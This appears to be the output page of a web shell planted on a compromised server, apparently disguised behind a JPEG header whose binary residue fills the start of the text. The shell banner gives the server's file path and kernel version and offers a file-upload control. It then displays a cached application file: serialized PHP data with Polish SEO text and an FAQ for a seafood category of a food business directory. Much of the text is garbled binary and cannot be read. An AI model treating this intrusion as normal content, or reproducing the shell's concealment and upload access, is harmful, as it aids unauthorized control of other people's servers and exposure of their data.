JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/4e/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/frontend/runtime/cache/4e/4e244af6767fb20070fec20c0189a64f.bin

a:2:{i:0;a:1:{i:0;a:1:{i:0;a:10:{s:11:"id_category";i:1558;s:9:"id_portal";i:71;s:4:"name";s:11:"Owoce morza";s:11:"description";N;s:4:"left";i:199;s:5:"right";i:200;s:5:"depth";i:2;s:10:"created_at";s:19:"2019-10-24 16:50:13";s:10:"updated_at";s:19:"2025-10-24 02:51:09";s:12:"seo_metadata";s:7705:"{"p_71": {"faq": "<script type=\"application/ld+json\">\n{\n  \"@context\": \"https://schema.org\",\n  \"@type\": \"FAQPage\",\n  \"mainEntity\": [\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy owoce morza były wcześniej mrożone?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Często tak – to standard bezpieczeństwa i jakości; informacja powinna być na etykiecie.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Na co zwracać uwagę przy zakupie krewetek?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Na kaliber, zawartość glazury, sposób obróbki (obrane/nieobrane) i pochodzenie.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy produkty MSC/ASC są droższe?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Zwykle tak, ale oferują gwarancję zrównoważonego pochodzenia i transparentności.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak prawidłowo przechowywać owoce morza przed przygotowaniem?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Świeże owoce morza przechowuj w temperaturze bliskiej 0–2°C i zużywaj szybko; mrożone utrzymuj w stałej temperaturze -18°C lub niższej. Unikaj cyklicznego rozmrażania i ponownego zamrażania.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy owoce morza są częstym alergenem?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak — skorupiaki (np. krewetki) i mięczaki (np. małże) są silnymi alergenami; producenci powinni informować o obecności alergenów na etykietach.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak sprawdzić świeżość małży i ostryg?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Żywe małże i ostrygi powinny mieć zamknięte muszle lub zamykać się przy dotknięciu; nie powinny wydzielać nieprzyjemnego zapachu. Otwartych, nieruchomych egzemplarzy należy unikać.\"\n      }\n    }\n  ]\n}\n</script>", "about": "Lista firm w kategorii Owoce morza: dostawcy krewetek, małży, kalmarów i ośmiornic, produkty świeże i mrożone, przetwórstwo, konfekcjonowanie i rozwiązania dla HoReCa.", "title": "Owoce morza – dostawcy i przetwórcy krewetek, małży, kalmarów | Jedzenie.info.pl", "keywords": "owoce morza, krewetki, małże, kalmary, ośmiornice, produkty IQF, mrożonki, konfekcjonowanie, MSC, ASC, produkty ekologiczne, HoReCa", "description_html": "<h1>Owoce morza</h1>\n<p>To kategoria premium obejmująca krewetki, małże, ośmiornice, kalmary i inne bezkręgowce morskie. W tej sekcji znajdziesz dostawców i przetwórców produktów świeżych, mrożonych, gotowanych oraz marynowanych – do gastronomii, handlu i przemysłu.</p>\n\n<h2>Najważniejsze informacje:</h2>\n<ul>\n<li>Oferta obejmuje krewetki, małże, ośmiornice, kalmary i mieszanki owoców morza</li>\n<li>Produkty dostępne są w formie świeżej, mrożonej (IQF), gotowanej oraz marynowanej</li>\n<li>Krytyczna jest kontrola łańcucha chłodniczego oraz certyfikaty (MSC/ASC, IFS/BRC)</li>\n<li>Konfekcjonowanie: vacuum, MAP i skin-pack zapewniają wydłużenie trwałości i bezpieczeństwo</li>\n<li>Sektor obsługuje HoReCa, handel detaliczny i produkcję przemysłową (private label, import/eksport)</li>\n</ul>\n\n<p><!-- pagebreak --></p>\n<h2>Wprowadzenie / kontekst kategorii</h2>\n<p>Rosnąca popularność kuchni śródziemnomorskiej i azjatyckiej napędza popyt na owoce morza. Kluczowe są świeżość, bezpieczeństwo mikrobiologiczne, przejrzyste pochodzenie oraz certyfikaty zrównoważonego rybołówstwa. Istotna jest też logistyka – transport i przechowywanie w kontrolowanej temperaturze.</p>\n<h2>Co oferują firmy z tej kategorii?</h2>\n<ul>\n  <li>Krewetki surowe i gotowane (różne kalibry, z ogonem/oczyszczone)</li>\n  <li>Małże (omułki, mule, małże św. Jakuba), ostrygi</li>\n  <li>Kalmary, ośmiornice, mątwy – tusze, krążki, ramiona</li>\n  <li>Mieszanki owoców morza, <a title=\"produkty IQF\" href=\"https://www.jedzenie.info.pl/firmy/lista/1518_mrozonki\" target=\"_blank\" rel=\"noopener\">produkty IQF</a></li>\n  <li>Wyroby marynowane i gotowe do podania</li>\n  <li>Linie premium, <a title=\"BIO\" href=\"https://www.jedzenie.info.pl/firmy/lista/1534_produkty-ekologiczne\" target=\"_blank\" rel=\"noopener\">BIO</a> i certyfikowane (MSC/ASC)</li>\n  <li><a title=\"Konfekcjonowanie\" href=\"https://www.jedzenie.info.pl/firmy/lista/1504_opakowania-spozywcze\" target=\"_blank\" rel=\"noopener\">Konfekcjonowanie</a>: vacuum, MAP, skin‑pack</li>\n  <li>Import/eksport, private label, rozwiązania HoReCa</li>\n</ul>\n<h2>Na co zwrócić uwagę przy wyborze / kryteria doboru</h2>\n<p>Ważne są: kaliber i forma produktu (surowe/gotowane), deklarowana zawartość glazury, kraj pochodzenia i metoda pozyskania, wyniki badań mikrobiologicznych, a także standardy przetwórni (IFS/BRC). Dla gastronomii liczy się powtarzalność i terminowość dostaw.</p>\n<h2>Korzyści biznesowe i operacyjne</h2>\n<p>Owoce morza podnoszą prestiż menu i marżę, umożliwiają tworzenie dań premium. Produkty IQF i MAP skracają czas przygotowania, a dokładne porcjowanie ogranicza straty.</p>\n<h2>Zastosowania / przykładowe scenariusze</h2>\n<p>Restauracje serwują krewetki short‑order i carpaccio z przegrzebków. Sklepy detaliczne sprzedają mieszanki owoców morza IQF. Producenci garmażerki wytwarzają sałatki i tapas z małżami.</p>\n<h2>Najczęściej zadawane pytania (FAQ)</h2>\n<h3>Czy owoce morza były wcześniej mrożone?</h3>\n<p>Często tak – to standard bezpieczeństwa i jakości; informacja powinna być na etykiecie.</p>\n<h3>Na co zwracać uwagę przy zakupie krewetek?</h3>\n<p>Na kaliber, zawartość glazury, sposób obróbki (obrane/nieobrane) i pochodzenie.</p>\n<h3>Czy produkty MSC/ASC są droższe?</h3>\n<p>Zwykle tak, ale oferują gwarancję zrównoważonego pochodzenia i transparentności.</p>\n<h3>Jak prawidłowo przechowywać owoce morza przed przygotowaniem?</h3>\n<p>Świeże owoce morza przechowuj w temperaturze bliskiej 0–2°C i zużywaj szybko; mrożone utrzymuj w stałej temperaturze -18°C lub niższej. Unikaj cyklicznego rozmrażania i ponownego zamrażania.</p>\n<h3>Czy owoce morza są częstym alergenem?</h3>\n<p>Tak — skorupiaki (np. krewetki) i mięczaki (np. małże) są silnymi alergenami; producenci powinni informować o obecności alergenów na etykietach.</p>\n<h3>Jak sprawdzić świeżość małży i ostryg?</h3>\n<p>Żywe małże i ostrygi powinny mieć zamknięte muszle lub zamykać się przy dotknięciu; nie powinny wydzielać nieprzyjemnego zapachu. Otwartych, nieruchomych egzemplarzy należy unikać.</p>\n<h2>Zobacz również</h2>\n<ul>\n  <li><a title=\"Ryby i owoce morza\" href=\"https://www.jedzenie.info.pl/firmy/lista/1557_ryby-i-owoce-morza\" target=\"_blank\" rel=\"noopener\">Ryby i owoce morza</a></li>\n  <li><a title=\"Mrożonki\" href=\"https://www.jedzenie.info.pl/firmy/lista/1518_mrozonki\" target=\"_blank\" rel=\"noopener\">Mrożonki</a></li>\n  <li><a title=\"Konserwy\" href=\"https://www.jedzenie.info.pl/firmy/lista/1517_konserwy\" target=\"_blank\" rel=\"noopener\">Konserwy</a></li>\n</ul>", "description_plaintext": "Znajdź dostawców i przetwórców owoców morza: krewetki, małże, kalmary, ośmiornice — świeże, mrożone, marynowane. Informacje o certyfikatach, konfekcjonowaniu IQF/MAP oraz zastosowaniach w HoReCa i handlu."}}";}}}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:5:{i:0;s:13:"company_75610";i:1;s:19:"presentation_111256";i:2;s:32:"presentation_111256_contact_data";i:3;s:18:"company_75610_tabs";i:4;s:40:"presentation_111256_industries_and_range";}s:4:"data";a:5:{s:32:"addfcce0534f40a2e42b47374e34a0b4";s:21:"0.08464100 1750445436";s:32:"13a1f55a518beb172d81497808b01114";s:21:"0.08464100 1750445436";s:32:"155805d8388932f25c32722e69a1ffec";s:21:"0.08464100 1750445436";s:32:"2e650975c95fa3ce40ea67162fad901e";s:21:"0.08464100 1750445436";s:32:"c406fb594cfca909851a683d187c1152";s:21:"0.03530300 1759954481";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com